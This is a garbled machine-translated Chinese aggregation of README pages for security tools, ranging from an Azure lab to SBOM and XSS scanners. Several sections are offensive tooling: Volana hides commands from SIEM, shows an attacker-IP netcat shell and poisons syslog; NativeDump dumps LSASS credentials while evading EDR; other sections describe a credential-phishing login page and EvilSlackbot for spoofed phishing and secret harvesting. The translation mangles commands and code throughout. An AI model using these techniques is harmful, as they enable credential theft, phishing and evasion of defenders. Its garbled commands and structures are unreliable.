$ git克隆https://github.com/xmcyber/xmgoat.git

$ CD XMGOAT

$ CD场景

$ CD方案_ \方案其中\方案是您要完成的方案编号

$ Terraform Init

$ Terraform Plan -out \ filename

$ Terraform Apply \ filename其中\ filename是输出文件的名称

入门

要获得初始用户和服务主凭据,请运行以下查询:

$ Terraform输出-JSON用于服务主体,使用application_id.value和application_secret.value。

对于用户,使用username.value和password.value。

清理

完成方案后,运行以下命令以清洁房客中创建的所有资源

$ AZ登录

$ CD XMGOAT

$ CD场景

$ CD方案_ \方案其中\方案是您要完成的方案编号

$ Terraform销毁

AVvXsEjMpNK6ke1fMDaTp3RU_dC5NuigZxpNAUS1

分析缺少安全功能,信息披露等的二进制文件。

挤压处正处于发展的早期阶段,目前仅支持小精灵和男子气概的二进制文件。 PE(Windows)二进制文件将很快得到支持。

用法

用法:

挤出[flags] [文件]

FLAGS:

-a, - 所有显示所有测试的详细信息,而不仅仅是失败的测试。

-w, - 即使仅发现警告,也具有非零状态的警告出口。

-h, - 挤压

docker

的帮助,您可以选择使用Docker Via:运行

docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

支持的检查

精灵

PIE RELRO BIND NOW Fortified Source Stack Canary NX Stack

男子气概

PIE Stack Canary NX Stack NX Heap ARC

Windows

Coming soon.

todo

添加对PE的支持添加秘密扫描检测数据包

AVvXsEjwHywu1MIETxz4EH2PyiPK3380XzJ4D5Pw

shell命令混淆以避免SIEM/检测系统

在五旬节期间,一个重要方面是隐身。因此,您应该在通过后清除轨道。然而,许多基础架构日志命令并将其发送到SIEM,使其实时使之后单独清洁部分无用。Volana提供了一种简单的方法来隐藏在折衷的机器上执行的命令(通过提供self shell运行时)(输入您的命令,Volana为您执行您的命令)。像这样,您在通过期间清除了曲目

用法

您需要获得交互式外壳。 (找到一种产生它的方法,您是黑客,这是您的工作!否则)。然后在目标机器上下载并启动它。就是这样,现在您可以键入要执行的命令

##从github发行

##如果您没有折衷的机器访问Internet,请找到另一种方式

curl -lo -l -l https://github.com/ariary/volana/releases/latest/download/volana

##执行它

./volana

##您现在处于雷达之下

Volana»Echo'Hi Siem团队!你找到我吗? /dev/null 21#您可以有点自大

volana»[命令] Volana Console: * RING:启用戒指模式即启动每个命令的关键字。

来自非交互式壳

想象一下您有一个非交互式外壳(Webshell或Blind RCE),您可以使用加密和解密子命令。以前,您需要使用嵌入式加密密钥构建Volana。

在攻击者机器上##用加密密钥构建Volana

制造构建。加入

##将其转移到目标(唯一可检测的命令)上

## [.]

##加密您要隐身执行的命令

##(这里是NC绑定以获得交互式外壳)

volana encr'nc [Attacker_ip] [Attacker_port] -e /bin /bash'

加密命令复制加密命令并使用您的RCE在目标机上执行。

##现在您有了一个绑定,生成它以使其具有互动性,并且通常使用Volana为隐形(./volana)。 +不要忘记在离开之前删除Volana二进制文件(原因是解密密钥可以很容易地从中检索)为什么不只是用echo [命令]隐藏命令| base64?并用echo [encoded_command]在目标上解码| base64 -d | bash

因为我们希望受到保护,免受触发基本64使用警报或寻求命令中的base64文本的系统。我们也希望使调查变得困难,而Base64并不是真正的刹车。

检测

请记住,Volana并不是一个使您完全看不见的奇迹。其目的是使入侵检测和调查更加努力。

通过检测,我们的意思是,如果执行某个命令,我们是否能够触发警报。

隐藏

只会捕获Volana发射命令线。 🧠但是,通过在执行它之前添加一个空间,默认的bash行为是不保存它

Detection systems that are based on history command output Detection systems that are based on history files .bash_history, '.zsh_history' etc . Detection systems that are based on bash debug traps Detection systems that are based on sudo built-in logging system Detection systems tracing all processes syscall system-wide (eg opensnoop) Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec,等等。)易于检测的避免3: pkill -9脚本不是常见的案例屏幕更难避免,但是它不会注册输入(秘密输入: stty -echo=避免避免)命令检测可以避免使用加密的VOLANA检测:01

可见

检测系统,该检测系统无法避免使用

Bug Bounty

的检测系统。 Not a common case Detection systems that are based on syslog files (e.g. /var/log/auth.log) Only for sudo or su commands syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info 'No hacker is povertyening your syslog solution, don't worry') Detection systems that are based on SYSCALL(例如AUDITD,LKML/EBPF)难以分析,可以通过使几种多样性SYSCALLS自定义LD_Preload注射以使Log并不是所有常见的情况3

信用

对您的010-1010的遗憾,但对于ClickBait标题而言,但不会为Contibutors提供任何钱,可以使LOG并不是一个常见的情况。

让我知道您是否找到了: *检测Volana *的一种方法,一种无法检测Volana命令*的间谍控制台*一种避免检测系统的方法

在这里报告

010-1010在控制台moonwalk:间谍的8种方法

AVvXsEhKmK1CLKAm_7uU78m5fKAXg-fMwZedEcxV

NativedUmp允许仅使用NTAPIS生成小型文件,仅使用Mimikatz或Pypykatz(SystemInInfo,Modulelist和Memory64List流)来解析的流式文件。

AVvXsEh11fh6aFNrHcYMfe0poV40nnVo76iyfvtZ

ntopenprocesstoken和ntadjustprivilegetoken获得“ sedebugprivilege”特权rtlgetversion以获取操作系统版本的详细信息(主要版本,次要版本和构建编号)。这对于SystemInfo流ntqueryInformationProcess和ntreadVirtualMemory才能获取LSASRV.DLL地址是必不可少的。这是模块流ntopenprocess为LSASS Process NtqueryVirtualMemory和NtreadVirtualMemory旋转循环并转储所有可能的模块,并倾倒所有可能的模块,并倾倒所有可能的模块。同时,它填充了存储器64list流usage:

nativedump.exe [dump_file]默认文件名是'proc_.dmp':

AVvXsEhKmK1CLKAm_7uU78m5fKAXg-fMwZedEcxV

该工具已针对Windows 10和11设备进行了测试,该设备具有最常见的安全解决方案(Microsoft Defender的端点,CrowdStrike .),并且目前尚未被发现。但是,如果系统中启用了PPL,则无效。

该技术的一些好处是:-它不使用众所周知的dbghelp!minidumpWritedump函数- 它仅使用ntdll.dll的函数,因此可以通过重新映射库来绕过API挂钩- 微型文件不必写入磁盘,您可以将其bytes bytes(Encoded或Encormented Machine)传输到远程计算机上)

该项目目前有三个分支

ntdlloverwrite -oftrrite ntdll.dll的'.text'部分,使用磁盘上的dll文件中的干净版本

委托-Drite ntdll.dll +动态函数分辨率+字符串加密使用AES + XOR编码

远程- 覆盖ntdll.dll +动态函数分辨率+带有AES +将文件发送到远程计算机+ XOR编码的字符串加密

详细的技术:创建一个最小的小型文件

在阅读微型未证明的结构后,其结构可求和到:

header:信息,例如签名('mdmp'),流目录的位置以及每个流的流量流目录:一个条目,其中包含每个流中的类型,大小和位置,每个流中的每个流中的每个流中的每个流中的总尺寸和位置,每个流都包含与过程的不同信息,并且可以从每个流程中读取其自身格式的区域3333333333333333333333333333333AVvXsEi_yDsCFsKrGVLs887ZYyNxsgamC8G---4f

我创建了一个解析工具,可以有用: MinidumPlasser。

我们将专注于创建一个有效的文件,仅具有标题,流目录的必要值以及由Mimikatz/pypykatz: SystemInfo,Modemulelist和Memory64List流对小型文件解析所需的仅有的3个流。

a。标题

标题是一个32字节结构,可以在C#AS:中定义

公共结构小型铅

{

公共UINT签名;

公共Ushort版本;

公共USHORT实施者;

公共ushort numberofstreams;

公共UINT StreamDirectoryRva;

公共UINT校验和

公共intptr Timedatamtamp;

} The required values are: - Signature: Fixed value0x504d44d ('MDMP' string) - Version: Fixed value0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value0x20 or 32 bytes, the size of the标题

b。流目录

流目录中的每个条目是一个12字形结构,因此具有3个条目的大小为36字节。条目的C#结构定义IS:

公共结构MinidumpStreamDirectoryEntry

{

公共UINT流型;

公共UINT尺寸;

公共UINT位置;

}字段'streamType'表示流的类型作为整数或ID,其中一些最相关的IS:

ID流类型0x00 UNUSESTREAM0x01保留stream00x02 revervedStream10x03 threadListStream0x04 ModuleListStream0x05 MemoryListStream0x06 extceptionsTream0x07 SystemInfoStream0x07 HandleDataStream0x0D FunctionTableStream0x0E UnloadedModuleListStream0x0F MiscInfoStream0x10 MemoryInfoListStream0x11 ThreadInfoListStream0x12 HandleOperationListStream0x13 TokenStream0x16 HandleOperationListStream

c。 SystemInformation流

First stream is a SystemInformation Stream, with ID 7. The size is 56个字节,并将位于流目录之后的偏移68(0x44)。它的C#定义IS:

公共结构SystemInformationsTream

{

公共USHORT处理学结构;

公共ushort processorlevel;

公共ushort加工审理;

公共字节编号流程;

公共字节producttype;

公共UINT Majorversion;

公共UINT次要转换;

公共UINT buildnumber;

公共UINT PlatformID;

公共Uint Unknownfield1;

公共Uint Unknownfield2;

公共INTPTR处理器;

公共Intptr ProcessorFeatures2;

公共Uint Unknownfield3;

公共Unkning Fieldfield14;

公共字节Unknownfield15;

}所需的值为: -ProcessOrarchitecture: 9用于64位,为32位Windows系统- 主要版本,次要版本和BuildNumber:硬编码或通过kernel32!getVersionex!

d。调节列表流

第二流是一个模块化流,具有ID 4。它位于系统信息信息流之后的Offset 124(0x7C),它也将具有112个字节的固定尺寸,因为它将具有单个模块的条目,即单个模块,唯一需要正确的一个模块。

该流的典型结构是一个4字节值,包含条目数量,然后是每个模块的108字节条目3:

公共结构调节流程

{

公共UINT编号模块;

公共模块[]模块;

}只有一个,它被简化为:

公共结构调节流程

{

公共UINT编号模块;

公共intptr baseaddress;

公共UINT尺寸;

公共Uint Unknownfield1;

公共UINT时间戳;

公共Uint Pointername;

public intptr unknownfield2;

public int intptr unknownfield3;

公共intptr unknownfield4;

public int intptr unknownfield5;

公共intptr unknownfield6;

公共intptr unknownfield7;

public int intptr unknownfield8;

公共intptr unknownfield9;

公共intptr unknownfield10;

公共intptr unknownfield11;

}所需的值为: -numberOfstreams:固定值1-使用psapi!getModulebasename或Ntdll!ntqueryInformationProcess和ntdll! 4096字节(0x1000),其他库的.TEXT部分-Pointertoname:'c: \ Windows \ windows \ system32 \ lsasrv.dll'字符串,位于流本身本身at offset 236(0xec)之后

e。 memory64list流

第三流是Memory64List流,具有ID 9。它位于Offset 298(0x12a)之后,在模块流式流和Unicode字符串之后,其大小取决于模块的数量。

公共结构内存64ListStream

{

公共乌隆数字;

公共uint memoryRegionsBaseadDress;

public Memory64Info [] MemoryInfoentries;

}每个模块条目是16个Bytes结构:

公共结构内存64Info

{

公共INTPTR地址;

公共intptr尺寸;

}所需的值为: -numberOfentries:内存区域数,在循环内存区域后获得- 内存baseaddress:内存区域开始的位置,在添加所有16 bytes内存条目的大小后,计算了每个有效区域的大小,在添加所有有效区域后,计算了每个有效区域的大小。

f。循环内存区域

有前提条件可以循环lsass.exe过程的内存区域,该过程只能使用NTAPIS:解决

获得“ Sedebugprivilege”许可。我们将使用ntdll!ntopenprocesstoken,ntdll!ntadjustprivilegemoken,而不是典型的Advapi!OpenProcessToken,Advapi!lookupprivilegevalue和advapi!aDjittokePrivilege,而不是ntdll!例如,使用ntdll!ntgetNextProcess循环所有进程,使用ntdll!ntqueryInformationProcess获取PEB地址,并使用ntdll!ntreadvirtualmemory读取processParameters中的imagePathName字段。为了避免过度复杂的POC,我们将使用.NET的Process.getProcessesbyName()打开一个过程句柄。使用ntdll!openprocess与权限process_query_information(0x0400)一起检索过程信息和process_vm_read(0x0010)以读取使用此过程的内存字节,可以通过调用: -ntddll! region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!ntreadvirtualmemory:在memory64list流之后,将该区域的字节添加到小型文件

g。创建小型文件

之后,我们拥有创建小型文件所需的一切。我们可以在本地创建一个文件或将字节发送到远程计算机,并可能在以前编码或加密字节。其中一些可能性是在代表分支中编码的,在该分支机构中,可以在本地编码XOR的文件,然后在远程分支中编码文件,该文件可以在发送到远程计算机之前使用XOR编码。

AVvXsEjwIweaKM4-WA8nl9CbYS4d-FfvoBvuUZdX

Pip-Intel是一种强大的工具,专为OSINT(开源智能)和网络智能收集活动而设计。它将各种开源工具整合到单个用户友好的接口中,简化了研究人员和网络安全专业人员的数据收集和分析过程。

Pip-Intel利用Python-Writen PIP软件包从各种数据点收集信息。该工具具有通过电子邮件地址,电话号码,IP地址和社交媒体帐户收集详细信息的能力。它提供了广泛的功能,包括基于电子邮件的OSINT操作,基于电话号码的查询,地理位置地址,社交媒体和用户分析,甚至是Dark Web搜索。

AVvXsEiPQRo43LBJ4SQ00n7icvcz0YeDYcI9dkXh

AVvXsEiWwylbpVBTyhSrpsDW6sHeBiwBF9HsNaiN

AVvXsEjaj4Wk6APp26SnsCReDL6syhQyPoE1Y6i6

AVvXsEgN6oeE9rga5xXPKNgSN6e9139yGVGjUywM

小偷浣熊是一种用于教育目的的工具,旨在证明如何在各种操作系统上进行网络钓鱼攻击。该工具旨在提高人们对网络安全威胁的认识,并帮助用户了解2FA和密码管理等安全措施的重要性。

功能

Windows 10,Windows 11,Windows XP,Windows Server,Ubuntu,Ubuntu Server和MacOS的网络钓鱼模拟。捕获用于教育演示的用户凭据。可自定义的登录屏幕模仿真实操作系统。全屏模式以增强网络钓鱼模拟。

安装

先决条件

Python 3.x Pip(Python包装安装程序)NGrok(用于将本地服务器暴露到Internet)

下载并安装

克隆repository:

安装python venv````bash apt安装python3.11-venv

创建VENV:

安装所需的库:

用法运行主脚本:````bash python app.py

在运行脚本后,选择网络钓鱼模拟的操作系统:您将提供一个菜单以选择操作系统。输入与您要模拟的操作系统相对应的数字。

访问网络钓鱼Page:如果您在同一本地网络(LAN)上,请打开Web浏览器并导航至3http://127.0.0.0.1:5000。

如果您想通过Internet访问网络钓鱼页面,请使用Ngrok。

使用Ngrok

从Ngrok.com下载并安装NGrok下载NGrok,并按照操作系统的安装说明进行下载。

在运行上述命令后,将本地服务器公开到Internet:获取公共URL:NGrok将为您提供公共URL。与您的测试对象共享此URL,以通过Internet访问网络钓鱼页面。

如何在Linux上安装NGrok?通过APT安装NGROK,具有以下命令:````bash curl -s https://ngrok -agent.s3.amazonaws.com/ngrok.asc.asc \ | | sudo tee/etc/apt/trusted.gpg.d/ngrok.asc.asc/dev/null \ echo'deb 3https://ngrok-agent.s3.amazonaws.com buster buster main \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ sudo apt update \ sudo apt apt install ngrok

运行以下命令将您的authtoken添加到默认的ngrok.yml

AVvXsEjkNqkJ4JSTGMe9h7TUb4TWZZ5WUL2p7ATW

用于识别网页输入和进行XSS扫描的实用程序。

功能:

子域发现:检索目标网站的相关子域,并将其整合到白名单中。这些子域可以在刮擦过程中使用。

网站范围的链接Discovery:根据提供的白名单和指定的max_depth收集整个网站上的所有链接。

形式和输入提取:标识了提取的链接中发现的所有形式和输入,从而生成JSON输出。该JSON输出是利用该工具的XSS扫描功能的基础。

XSS扫描:启动侦察选项返回包含提取条目的自定义JSON,X-RECON工具可以启动XSS漏洞测试过程,并为您提供所需的结果!

Note:

当前,扫描功能在SPA(单页应用程序)Web应用程序上不活动,我们仅在使用PHP开发的网站上对其进行了测试,从而产生了显着的结果。将来,我们计划将这些功能纳入工具。

Note:

该工具保留了在探索过程中跳过的文件扩展名的最新列表。默认列表包括图像,样式表和脚本('.css','。js','。mp4','。zip','png','png','。svg',jpeg','。您可以通过编辑设置。

安装

$ git克隆https://github.com/joshkar/x-recon

$ CD X-RECON

$ python3 -m pip install -r unigess.txt

$ python3 xr.py

测试目标:

您可以在“ get URL”部分中使用此地址

http://Testphp.vulnweb.com

AVvXsEibLA7OgxEjUGKcSPnDTkaOYSlcu-XKYNZI

这是一个简单的SBOM实用程序,旨在为执行哪些软件包提供内部视图。

流程和目标很简单,我们可以在APT安装的软件包上获得清晰的透视图(目前正在为RPM和其他软件包管理人员实施此包装)。这主要需要检查实际执行所有软件包。

安装

要求中提到了所需的软件包。txt文件,可以使用pip:安装

pip3 install -r unigess.txt

用法

首先安装软件包。其次,您需要设置环境变量,例如: -Mount Image:当前我仍在研究一种机制来自动定义安装点并安装不同类型的图像和卷,但对我来说仍然是一项非常重要的任务。最后运行该工具以列出所有软件包。参数描述- 分析模式指定操作模式。默认值是静态的。选择是静态的和chroot。 - 静态类型指定静态模式的分析类型。仅需静态模式。选择是信息和服务。 - Volume-Path指定了安装体积的路径。默认值为/mnt。 - 保存文件指定JSON输出的输出文件。 - 信息图指定是否生成视觉图进行Chroot分析。默认是正确的。 -PKG-MGR手动指定软件包管理器或不要添加此选项以进行自动检查。 APT:-静态信息分析:-此命令以静态分析模式运行该程序,专门使用信息目录分析方法。 - 它分析了位于/mnt的安装卷上安装的软件包。 - 它将输出保存在名为output.json的JSON文件中。 - 它生成用于Chroot分析的视觉图。 ``bash

python3 main.py-pkg-mgr apt - 分析模式静态- 静态型信息- volume-path /mnt /mnt -save-file output.json

````''静态服务分析:

此命令以静态分析模式运行该程序,专门使用服务文件分析方法。

它分析了位于/custom_mount的安装卷上安装的软件包。它将输出保存在名为output.json的JSON文件中。它不会生成视觉图进行CHROOT分析。 bash Python3 main.py-pkg-mgr apt - 分析模式静态- 静态型服务- volume-path /custom_mount -save-file output.json-info-graphic false

CHROOT分析有或没有图形输出:

此命令以Chroot分析模式运行程序。它分析了安装在/MNT的安装卷上的软件包。它将输出保存在名为output.json的JSON文件中。它生成可视觉图进行CHROOT分析。 For graphic output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan available for now. bash Python3 main.py-pkg-mgr rpm - 分析模式静态- volume-path /mnt-save-file output.json

CHROOT分析有或没有图形输出:准确地在APT上完成。 bash Python3 main.py-pkg-mgr rpm - 分析模式chroot -volume-path /mnt-save-file output.json -json-info-graphic trie /false

支持图像

当前该工具在debian和debian and Red Hat的工具上工作,我可以保证Debian的图像,但我可以保证debian untufs debian offects bud the Red-hat曾经需要完美的工作。

我正在pacman方面工作,我正在尝试找到一种可相关的访问Pacman DB进行静态分析的方式。

图形输出图像(Chroot)

APT CHROOT

AVvXsEi7dHCLLRlu7cfeAYvx8YfHy5UyhPf_gRd7

rpm chroot

AVvXsEibLA7OgxEjUGKcSPnDTkaOYSlcu-XKYNZI

内部工作

用于工作和过程相关文档,请阅读Wiki Page:链接

todo

[X]支持RPM [X]支持APT [X]支持CHROOT分析的支持[X]支持版本的支持[X]支持Chroot图形输出[X]支持对PACMAN的有组织图形输出[X]支持PACMAN

想法和讨论

的支持。

AVvXsEiRWfECuVbr-exL-FApWtYbSZBm-gHEmu-G

evilslackbot

在Slack Workspaces中进行红色团队和网络钓鱼练习的松弛攻击框架。

免责声明

此工具仅适用于安全专业人员。未经任何明确的测试许可,请勿在任何Slack工作区中使用此工具。自行使用。

背景

成千上万的组织利用Slack来帮助员工进行交流,协作和互动。这些Slack Workspaces中的许多安装应用程序或机器人可用于自动化Slack内的不同任务。这些机器人是单独提供的权限,该权限决定了允许机器人通过Slack API请求的任务。要对Slack API进行身份验证,每个机器人都被分配一个以XOXB或XOXP开头的API令牌。这些令牌经常在某个地方泄漏。当这些令牌在红色团队锻炼中被剥落时,正确利用它们可能会很痛苦。现在,evilslackbot在这里可以自动化和简化该过程。您可以使用Evilslackbot发送欺骗的松弛消息,网络钓鱼链接,文件,并搜索Slack中泄漏的秘密。

网络钓鱼模拟

除了红色团队外,Evilslackbot还在考虑了松弛的网络钓鱼模拟。要使用Evilslackbot进行松弛的网络钓鱼练习,只需在松弛中创建一个机器人,允许您的机器人提供预期测试所需的许可,并为Evilslackbot提供您想通过模拟的Phishes(链接,文件,欺骗消息)进行测试的员工电子邮件列表

安装

Evilslackbot需要Python3和SlackClient

PIP3安装SlackClient

用法

USAGE: Evilslackbot.py [-h] -t Token [-sp] [-m] [-s] [-s] [-a] [-a] [-f文件] [-e电子邮件]

[-CH频道] [-EL email_list] [-c] [-o outfile] [-cl]

Options:

-h, - 赫尔普显示此帮助消息和退出

必需:

-t令牌, - token doken

松弛的Oauth令牌

攻击:

-sp, - 欺骗松懈消息,自定义您的姓名,图标等

(需要-E,-EL或-CH)

-m, - 消息发送消息作为与您的令牌关联的机器人

(需要-E,-EL或-CH)

-s, - 搜索带有关键字的秘密的搜索搜索片段

-a,-attach发送包含恶意附件的消息(需要-f

和-E,-EL或-CH)

参数:

-f文件, - 文件文件附件的文件路径

-E电子邮件, - 电子邮件电子邮件

目标电子邮件

-ch频道, - 通道频道

目标松弛频道(不包括#)

-el email_list,-email_list email_list

通往由Newline分隔的电子邮件列表的途径

-c, - 检查查找并显示权限和可用攻击

与您提供的令牌相关联。

-o折叠, - 卸货支出

超越存储搜索结果

-cl,-Channel_list列出所有公共休闲频道

令牌

要使用此工具,您必须提供XOXB或XOXP令牌。

必需:

-t代币, - token代币(Slack xoxb/xoxp令牌)Python3 Evilslackbot.py -t代币

攻击

,具体取决于与您的令牌相关的权限,有几种攻击evilslackbot可以进行。 Evilslackbot将自动检查令牌的权限,并将显示它们以及您能够使用给定令牌执行的任何攻击。

攻击:

-sp,-spof欺骗松弛消息,自定义您的姓名,图标等(需要-e,-el或-Ch)

-m, - 消息发送一条消息作为与您的令牌关联的bot(需要-e,-el或-ch)

-s, - 搜索带有关键字的秘密的搜索搜索片段

-a, - attach发送包含恶意附件的消息(需要-f和-e,-e,-el或-CH)

欺骗消息(-sp)

具有正确的令牌权限,Evilslackbot允许您在模仿botname和bot照片的同时发送网络钓鱼消息。此攻击还需要目标的电子邮件地址(-e),目标电子邮件(-el)的列表或Slack Channel(-CH)的名称。 Evilslackbot将使用这些参数查找与提供的电子邮件或频道名称相关联的用户的松弛。要自动攻击,请使用电子邮件列表。

Python3 Evilslackbot.py -T XOXB令牌-SP -E电子邮件地址

Python3 Evilslackbot.py -T XOXB令牌-SP -EL电子邮件列表

Python3 Evilslackbot.py -T XOXB令牌-SP -CH频道名称

网络钓鱼消息(-m)

具有正确的令牌权限,Evilslackbot允许您发送包含网络钓鱼链接的网络钓鱼信息。这次攻击与欺骗攻击不同的是,此方法将作为与您提供的令牌关联的机器人发送消息。您将无法选择发送phish的机器人的名称或图像。此攻击还需要目标的电子邮件地址(-e),目标电子邮件(-el)的列表或Slack Channel(-CH)的名称。 Evilslackbot将使用这些参数查找与提供的电子邮件或频道名称相关联的用户的松弛。要自动攻击,请使用电子邮件列表。

Python3 Evilslackbot.py -T XOXB令牌-M -E电子邮件地址

Python3 Evilslackbot.py -T XOXB令牌-M -EL电子邮件列表

Python3 Evilslackbot.py -t XOXB令牌-M -CH频道名称

秘密搜索(-s)

具有正确的令牌权限,Evilslackbot允许您通过关键字搜索搜索Slack for Secrol。目前,此攻击需要XOXP令牌,因为XOXB令牌无法获得Slack中关键字搜索的适当权限。使用-o参数将搜索结果写入淘汰赛。

Python3 Evilslackbot.py -t xoxp令牌-s -o outfile.txt

附件(-a)

具有正确的令牌权限,Evilslackbot允许您发送文件附件。附件攻击需要您要发送的文件(-f)的路径。此攻击还需要目标的电子邮件地址(-e),目标电子邮件(-el)的列表或Slack Channel(-CH)的名称。 Evilslackbot将使用这些参数查找与提供的电子邮件或频道名称相关联的用户的松弛。要自动攻击,请使用电子邮件列表。

Python3 Evilslackbot.py -T xoxb令牌-A -F文件-E电子邮件地址

Python3 Evilslackbot.py -T XOXB令牌-A -F文件-EL电子邮件列表

python3 Evilslackbot.py -t xoxb令牌-a -f文件途径-ch通道名称

参数

参数:

-f文件, - 文件文件附件的文件路径

-e电子邮件, - 目标的电子邮件电子邮件

-ch通道, - 通道频道目标松弛通道(不包括#)

-el email_list,-email_list email_list通往纽文分隔的电子邮件列表的路径

-c, - 检查查找并显示与您提供的令牌相关的权限和可用攻击。

-o outfile,-utfile Outfile Outfile用于存储搜索结果

-cl,-Channel_list列表所有公共休闲频道

频道搜索

具有正确的权限,Evilslackbot可以在Slack Workspace中搜索并列出所有公共渠道。这可以帮助计划在哪里发送频道消息。使用-O将列表写入列表。

Python3 Evilslackbot.py -t xoxb代币-cl

AVvXsEgLJuDrtix83kgvlBSd-ACckYjVAatjmSkt

Howdy!我的名字叫哈里森马云惹不起马云理查森(Harrison Richardson),即卢比(RS0N)(纵火案),当我想让自己凉爽的时候。此存储库中的代码始于一小部分脚本,以帮助自动化我发现自己重复的许多常见的错误赏金狩猎过程。随着时间的流逝,我构建了一个具有MongoDB连接的简单Web应用程序,以管理我的发现并确定有价值的数据点。经过5年的Bug Bounty狩猎,无论是兼职还是全日制,我终于准备将此工具集合到适当的框架中。

ARS0N框架旨在为有抱负的应用程序安全工程师提供所需的所有工具,以利用Bug Bounty Hunting作为学习有价值的,现实世界中的Appsec概念并做到这一点的手段!我的目标是通过提供易于使用的自动化工具与教育内容以及针对广泛的基于Web和基于云的漏洞的方式提供易于使用的自动化工具,以降低错误赏金狩猎的入境障碍。结合我的YouTube内容,此框架将帮助有抱负的应用程序安全工程师快速,轻松地理解现实世界中的安全概念,这些概念直接转化为网络安全领域的高薪职业。

除了将此工具用于漏洞赏金狩猎外,有抱负的工程师还可以将此GitHub存储库用作画布来练习与其他开发人员合作!该工具的灵感来自Metasploit,并以类似的方式设计为模块化。每个脚本(ex: wildfire.py或slowburn.py)基本上都是一种算法,该算法以特定的模式运行模块(ex: fire-starter.py或fire-scanner.py),以获得所需的结果。由于这种设计,社区可以自由构建新脚本来求解特定的用例或模块以扩展这些脚本的结果。通过在此框架中学习代码并使用Github贡献自己的代码,有抱负的工程师将继续学习可在安全工程师I职位的第一天应用的现实世界技能。

我希望这个模块化框架将充当画布,以帮助分享我在职业生涯中学到的知识与下一代安全工程师!相信我,我们需要我们能获得的所有帮助!

快速启动

将此代码粘贴到卡利Linux 2023.4的干净安装中,以下载,安装和运行Framework的最新稳定Alpha版本:

sudo apt更新sudo apt-get更新

sudo apt -y升级sudo apt -get -y升级

WGET https://GITHUB.com/r-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz

TAR -XZVF ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

RM ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

CD ARS0N-FRAMEWORK

./install.sh

下载最新稳定的alpha版本

WGET https://Github.com/r-s0n/ars0n-framework/releases/download/download/v0.2-alpha/ars0n-framework-v0.0.0.2-12-alpha.2-alpha.tar.tar.gz

TAR -XZVF ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

RM ARS0N-FRAMEWORK-V0.0.2-ALPHA.TAR.GZ

安装

ARS0N框架包括一个脚本,该脚本安装了所有必要的工具,软件包等,这些脚本在清洁安装Kali Linux 2023.4上运行框架所需的脚本。

请注意,此框架的唯一支持安装是在卡利Linux 2023.3的清洁安装上。如果您选择尝试在干净的Kali安装之外运行框架,如果您有任何问题,我将无法帮助故障排除。/install.sh此视频准确地显示了成功安装的期望。

如果您使用的是ARM处理器,则需要将-arm标志添加到所有安装/运行脚本./install.sh -Arm中,当安装开始时,将提示您进入各种API键和令牌。输入这些并不需要运行框架的核心功能。如果您在安装时不输入这些API键和令牌,只需在每个提示中点击输入即可。键稍后可以添加到〜/.keys目录。有关如何手动添加这些键的更多信息,请访问此读数的常见问题部分。

运行Web应用程序(客户端和服务器)

安装完成后,您将获得通过输入Y来运行应用程序的选项。如果您不选择立即运行该应用程序,或者如果需要在重新启动后需要运行该应用程序,请直接直接导航到run.sh run.sh bash脚本。

./run.sh如果您使用的是ARM处理器,则需要将-arm标志添加到所有安装/运行脚本./run.sh -arm

核心模块

中,ARS0N Framework的核心模块用于确定基本的扫描逻辑。每个脚本旨在根据用户试图完成的操作来支持特定的侦察方法。

野火

目前,野火脚本是ARS0N框架中使用最广泛的核心模块。该模块的目的是允许用户扫描多个目标,这些目标允许对研究人员发现的任何子域进行测试。

它如何工作:

用户通过图形用户界面(GUI)添加了根域,他们希望根据上次扫描这些域中的每个域中的每个域,以确保使用基于用户提供的标志的标志来确保对每个野火扫描的每个域进行扫描,以确保使用最古老的数据进行扫描的每个域扫描域的域。如果所有子模型都在运行,则大多数野火扫描需要8到48小时才能完成。此计时的变化可能是由许多因素引起的,包括目标应用程序和运行框架的机器。

另外,请注意,在扫描完成之前,大多数数据不会在GUI中显示。最好尝试在一个周末或周末进行扫描,具体取决于扫描的域数量,并在扫描完成后返回以从侦察到枚举。运行Wildfire:

图形用户界面(GUI)

野火可以使用仪表板上的野火按钮从GUI运行。单击后,前端将使用屏幕上的复选框来确定应将哪些标志传递给扫描仪。

请注意,从GUI进行的扫描仍然有一些尚未解决的错误和边缘案例。如果您有任何问题,则可以简单地将扫描形式运行CLI。

命令行接口(CLI)

ARS0N框架的所有核心模块都存储在/工具包目录中。只需导航到目录并用必要的标志运行wildfire.py。必须至少提供一个子模块标志。

Python3 Wildfire.py- start - -Cloud- -Scan

slowburn

与Wildfire模块不同,Wildfire模块要求用户识别目标域进行扫描,Slowburn模块对您有用。通过与API进行各种错误赏金狩猎平台进行通信,该脚本将确定所有允许在任何发现的子域进行测试的域。一旦数据填充,Slowburn将一次随机选择一个域以野火与野火相同的方式进行扫描。

请注意,Slowburn模块仍在开发中,不被视为稳定alpha版本的一部分。用户可能会遇到错误和边缘案例。为了使Slowburn识别扫描目标,必须首先对其进行初始化。此初始化步骤从各种API收集必要的数据,并将它们存储到本地存储的JSON文件中。一旦完成初始化步骤,Slowburn将一次自动开始选择和扫描一个目标。

要初始化slowburn,只需运行以下命令:

python3 slowburn.py- initialize一旦收集了数据,将取决于用户是否要在下一次扫描时重新定位该工具。

请记住,公共错误赏金程序上的范围和目标可能会经常改变。如果您选择在不初始化数据的情况下运行slowburn,则可能是该程序范围不再范围的扫描域。强烈建议在运行前每次都重新定位慢烧。如果您选择不重新定位目标数据,则可以使用以下命令:的先前收集的数据运行slowburn

python3 slowburn.py

子模块

